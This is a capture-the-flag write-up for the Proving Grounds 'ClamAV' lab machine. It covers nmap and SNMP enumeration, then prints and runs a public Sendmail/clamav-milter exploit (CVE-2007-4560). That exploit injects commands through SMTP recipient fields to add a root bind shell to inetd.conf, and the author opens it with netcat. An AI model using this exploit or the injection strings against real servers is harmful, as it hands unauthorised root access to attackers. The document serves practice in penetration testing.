ClamAV

Enumeration:

Port Scanning:

As always we are going to start with nmap:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.219.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 20:03 +03
Nmap scan report for 192.168.219.42                                                                                                                      22:16:40 [40/1003]
Host is up, received echo-reply ttl 61 (0.13s latency).
Scanned at 2025-10-01 20:03:43 +03 for 336s  
Not shown: 65525 closed tcp ports (reset)                                            
PORT      STATE    SERVICE     REASON                                 VERSION
22/tcp    open     ssh         syn-ack ttl 61                         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:                                                                                                                                                             
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)                                                                                                             
| ssh-dss AAAAB3NzaC1kc3MAAACBALr/RyBq802QXa1Bh4SQEUHqD+p9TEx3SUvPHACbT0tQqR3aali+ifDiOpqMToVaRfWzYOOsoM2Neg0EPa4KsJIwSTkFqjd/3Ynp3Yzus0nN+gtmbQRKzo8QfStr6IGt6kaI6viXl4z3w
w6ryEkjNnb74KCooHOjyeGPi3o89GVnAAAAFQDSg0dwMrSn9juW/XPvo8S8kVOhDQAAAIARaqFuvZCqiTY8i/PITsr5WvyZm8mQ0nuqB6gW6y1h4jDAvtHO4TIZEMJ5vtPst0w9mVSYGVFlukhCqhbJdBigqH1WB1p7kwC78M9k
23zZmzuwbnzYPiLHpEdfFEWdO62ZoCSFBXWOqe1IZaTaRCgUZPeB1QFXRCQ96VrJizPLUAAAAIEArOALxR78fZrUqmUcYOs5tf8wu5xChAUqAfh1ElJ6r3EjcWwXId12jo1uAz0JmCTluUQhjhNDJB6XIgUzoFzW1NZPjGCkex7
s1+2+TUTmqFr6Nr97k2RIy91Bpuxwg5jzE83cKPCOoWVbYlfzAqNkF4xxznfC3fRtmj2e/L9chzg=                                                                                              
|   1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAviGcDkDxKzv7w++DXy6q+5AJDpG/q8Um8j4BheW9fgwsOvQCuDvLcPUIKMYEz4aUgkt/sSCXu29XTlu79pEkb48+BnaRCKrHLH/YWM79GT6Q5ie9jP47HjjJeCCBI/c02qpkH
/fjz9FK4HQPC7WtXY9EgW4IMB+pzX2KZxK2PF0=                                                                                                                                    
25/tcp    open     smtp        syn-ack ttl 61                         Sendmail 8.13.4/8.13.4/Debian-3sarge3                                                                
| smtp-commands: localhost.localdomain Hello [192.168.45.186], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For
 more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmas
ter at your site. 2.0.0 End of HELP info                                             
80/tcp    open     http        syn-ack ttl 61                         Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-title: Ph33r                                                                                                                                                        
| http-methods:                           
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE                                                 
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
139/tcp   open     netbios-ssn syn-ack ttl 61                         Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp   open     smux        syn-ack ttl 61                         Linux SNMP multiplexer
445/tcp   open     netbios-ssn syn-ack ttl 61                         Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
43523/tcp filtered unknown     host-unreach from 10.73.110.248 ttl 62
58146/tcp filtered unknown     host-unreach from 10.73.110.248 ttl 62
60000/tcp open     ssh         syn-ack ttl 61                         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:                                                                                                                                                             
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)                       
| ssh-dss AAAAB3NzaC1kc3MAAACBALr/RyBq802QXa1Bh4SQEUHqD+p9TEx3SUvPHACbT0tQqR3aali+ifDiOpqMToVaRfWzYOOsoM2Neg0EPa4KsJIwSTkFqjd/3Ynp3Yzus0nN+gtmbQRKzo8QfStr6IGt6kaI6viXl4z3w
w6ryEkjNnb74KCooHOjyeGPi3o89GVnAAAAFQDSg0dwMrSn9juW/XPvo8S8kVOhDQAAAIARaqFuvZCqiTY8i/PITsr5WvyZm8mQ0nuqB6gW6y1h4jDAvtHO4TIZEMJ5vtPst0w9mVSYGVFlukhCqhbJdBigqH1WB1p7kwC78M9k
23zZmzuwbnzYPiLHpEdfFEWdO62ZoCSFBXWOqe1IZaTaRCgUZPeB1QFXRCQ96VrJizPLUAAAAIEArOALxR78fZrUqmUcYOs5tf8wu5xChAUqAfh1ElJ6r3EjcWwXId12jo1uAz0JmCTluUQhjhNDJB6XIgUzoFzW1NZPjGCkex7
s1+2+TUTmqFr6Nr97k2RIy91Bpuxwg5jzE83cKPCOoWVbYlfzAqNkF4xxznfC3fRtmj2e/L9chzg=                                                                                              
|   1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAviGcDkDxKzv7w++DXy6q+5AJDpG/q8Um8j4BheW9fgwsOvQCuDvLcPUIKMYEz4aUgkt/sSCXu29XTlu79pEkb48+BnaRCKrHLH/YWM79GT6Q5ie9jP47HjjJeCCBI/c02qpkH
/fjz9FK4HQPC7WtXY9EgW4IMB+pzX2KZxK2PF0=                                              
60578/tcp filtered unknown     host-unreach from 10.73.110.248 ttl 62
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Also I will scan for UDP ports:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ sudo nmap -sCVU --top-ports=100 -vv -oA nmap/UPDservices --open 192.168.219.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 20:12 +03
Nmap scan report for 192.168.219.42
Host is up, received echo-reply ttl 61 (0.12s latency).
Scanned at 2025-10-01 20:12:56 +03 for 251s
Not shown: 97 closed udp ports (port-unreach)
PORT    STATE         SERVICE     REASON              VERSION
137/udp open          netbios-ns  udp-response ttl 61 Samba nmbd netbios-ns (workgroup: WORKGROUP)
| nbns-interfaces:                                                                                                                                                         
|   hostname: 0XBABE
|   interfaces:
|_    192.168.219.42
138/udp open|filtered netbios-dgm no-response
161/udp open          snmp        udp-response ttl 61 SNMPv1 server; U.C. Davis, ECE Dept. Tom SNMPv3 server (public)
| snmp-info:
|   enterprise: U.C. Davis, ECE Dept. Tom
|   engineIDFormat: unknown
|   engineIDData: 9e325869f30c7749
|   snmpEngineBoots: 60
|_  snmpEngineTime: 13m00s
| snmp-processes:
<snipped>

We can see that we have multiple open ports, we will inspect each one on its own.

SNMP (161):

I will start with snmp, we can use multiple tools to interact with the snmp server, such as onesixtyone, snmpwalk, snmpbulkwalk, snmp-check, etc.

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ snmpbulkwalk -c public -v2c -t 10 192.168.219.42
iso.3.6.1.2.1.1.1.0 = STRING: "Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (317626) 0:52:56.26
iso.3.6.1.2.1.1.4.0 = STRING: "Root <root@localhost> (configure /etc/snmp/snmpd.local.conf)"
iso.3.6.1.2.1.1.5.0 = STRING: "0xbabe.local"
iso.3.6.1.2.1.1.6.0 = STRING: "Unknown (configure /etc/snmp/snmpd.local.conf)"
<snipped>            
iso.3.6.1.2.1.25.4.2.1.2.3773 = STRING: "klogd"                  
iso.3.6.1.2.1.25.4.2.1.2.3777 = STRING: "clamd"                                      
iso.3.6.1.2.1.25.4.2.1.2.3782 = STRING: "clamav-milter"                              
iso.3.6.1.2.1.25.4.2.1.2.3791 = STRING: "inetd"                                      
iso.3.6.1.2.1.25.4.2.1.2.3795 = STRING: "nmbd"                                       
iso.3.6.1.2.1.25.4.2.1.2.3797 = STRING: "smbd"                                                                                                                             
iso.3.6.1.2.1.25.4.2.1.2.3801 = STRING: "snmpd"                                      
iso.3.6.1.2.1.25.4.2.1.2.3802 = STRING: "smbd"                                       
iso.3.6.1.2.1.25.4.2.1.2.3808 = STRING: "sshd"                                       
iso.3.6.1.2.1.25.4.2.1.2.3886 = STRING: "sendmail-mta"                               
iso.3.6.1.2.1.25.4.2.1.2.3900 = STRING: "atd"                                        
<snipped>

We can see that we can access it with the default community string. We will find under the running processes that clamav is running along with sendmail and snmp, etc.

HTTP (80):

Browsing the website:

Nothing realy interesting, just some binary text.

Exploitation:

Using what we have collected so far, I will search for any public exploits for and clamav:

Or simply using searchsploit:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]                                                                                                                    
└─$ searchsploit clamav-milter                                                                                                                                           
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                           |  Path                           
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution                                                                          | multiple/remote/4761.pl         
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

We will find that we have one written in perl, I will mirror it to my current directory:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ searchsploit -m multiple/remote/4761.pl
  Exploit: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/4761
     Path: /usr/share/exploitdb/exploits/multiple/remote/4761.pl
    Codes: CVE-2007-4560
 Verified: True
File Type: ASCII text
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/ClamAV/4761.pl

We can go through it to understand how the attack goes, and if it has any malicious stuff:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ cat 4761.pl 
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;

print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";

if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}

print "Attacking $ARGV[0]...\n";

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '25',
                              Proto    => 'tcp');

print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";

while (<$sock>) {
        print;
}

# milw0rm.com [2007-12-21]

It is just command execution in the recipient field of the email, and this script will open us a bind shell on port 31337, I will run it with perl:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ perl 4761.pl 192.168.219.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.219.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Wed, 1 Oct 2025 18:18:40 -0400; (No UCE/UBE) logging access from: [192.168.45.186](FAIL)-[192.168.45
.186]
250-localhost.localdomain Hello [192.168.45.186], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 591MIeAQ004239 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection

The exploit seems it went correctly.

I will use nmap again to scan if the port opened:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ sudo nmap -p 31337 192.168.219.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 22:34 +03
Nmap scan report for 192.168.219.42
Host is up (0.21s latency).

PORT      STATE SERVICE
31337/tcp open  Elite

Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds

Indeed it is open, I will connect to it using netcat:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ nc -nv 192.168.219.42 31337
(UNKNOWN) [192.168.219.42] 31337 (?) open
/bin/bash -i
bash: no job control in this shell
root@0xbabe:/#

We are already root.

I will get the root flag:

root@0xbabe:/# cat /root/proof.txt
8e715ce73ff4440c8155fe8faaaad31a

PreviousLinux NextPelican

Last updated 4 months ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagSNMP (161):

hashtagHTTP (80):

hashtagExploitation:

Enumeration:

Port Scanning:

SNMP (161):

HTTP (80):

Exploitation: